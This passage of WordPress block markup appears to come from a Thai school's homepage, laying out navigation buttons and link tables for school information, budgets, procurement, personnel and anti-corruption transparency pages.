%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":758,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-2.png\" alt=\"\" class=\"wp-image-758\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=716\" data-type=\"page\" data-id=\"716\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 